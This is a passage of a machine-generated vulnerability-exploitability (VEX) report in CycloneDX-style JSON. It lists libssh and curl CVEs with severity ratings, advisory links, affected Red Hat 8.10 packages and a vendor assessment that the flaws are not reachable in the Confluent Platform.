          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3731",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        119,
        125
      ],
      "description": "A weakness has been identified in libssh up to 0.11.3. The impacted element is the function sftp_extensions_get_name/sftp_extensions_get_data of the file src/sftp.c of the component SFTP Extension Name Handler. Executing a manipulation of the argument idx can lead to out-of-bounds read. The attack may be performed from remote. Upgrading to version 0.11.4 and 0.12.0 is sufficient to resolve this issue. This patch is called 855a0853ad3abd4a6cd85ce06fce6d8d4c7a0b60. You should upgrade the affected component.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3731"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3731"
        },
        {
          "url": "https://gitlab.com/libssh/libssh-mirror/-/commit/855a0853ad3abd4a6cd85ce06fce6d8d4c7a0b60"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3731"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8093-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8093-2"
        },
        {
          "url": "https://vuldb.com/?ctiid.349709"
        },
        {
          "url": "https://vuldb.com/?id.349709"
        },
        {
          "url": "https://vuldb.com/?submit.767120"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3731"
        },
        {
          "url": "https://www.libssh.org/files/0.12/libssh-0.12.0.tar.xz"
        },
        {
          "url": "https://www.libssh.org/security/advisories/libssh-2026-sftp-extensions.txt"
        }
      ],
      "published": "2026-03-08T11:15:50+00:00",
      "updated": "2026-06-17T10:44:05+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-3783",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        522
      ],
      "description": "When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer\nperforms a redirect to a second URL, curl could leak that token to the second\nhostname under some circumstances.\n\nIf the hostname that the first request is redirected to has information in the\nused .netrc file, with either of the `machine` or `default` keywords, curl\nwould pass on the bearer token set for the first host also to the second one.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3783"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/11/2"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55439"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3783"
        },
        {
          "url": "https://bugzilla.redhat.com/2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/2496763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496763"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3783.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3783.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3783"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8286"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9547"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55439.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55439"
        },
        {
          "url": "https://github.com/advisories/GHSA-8whr-249c-vfjp"
        },
        {
          "url": "https://hackerone.com/reports/3583983"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-3783.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3783"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8084-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3783"
        }
      ],
      "published": "2026-03-11T11:16:00+00:00",
      "updated": "2026-06-17T10:44:12+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3784",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        305
      ],
      "description": "curl would wrongly reuse an existing HTTP proxy connection doing CONNECT to a\nserver, even if the new request uses different credentials for the HTTP proxy.\nThe proper behavior is to create or use a separate connection.",
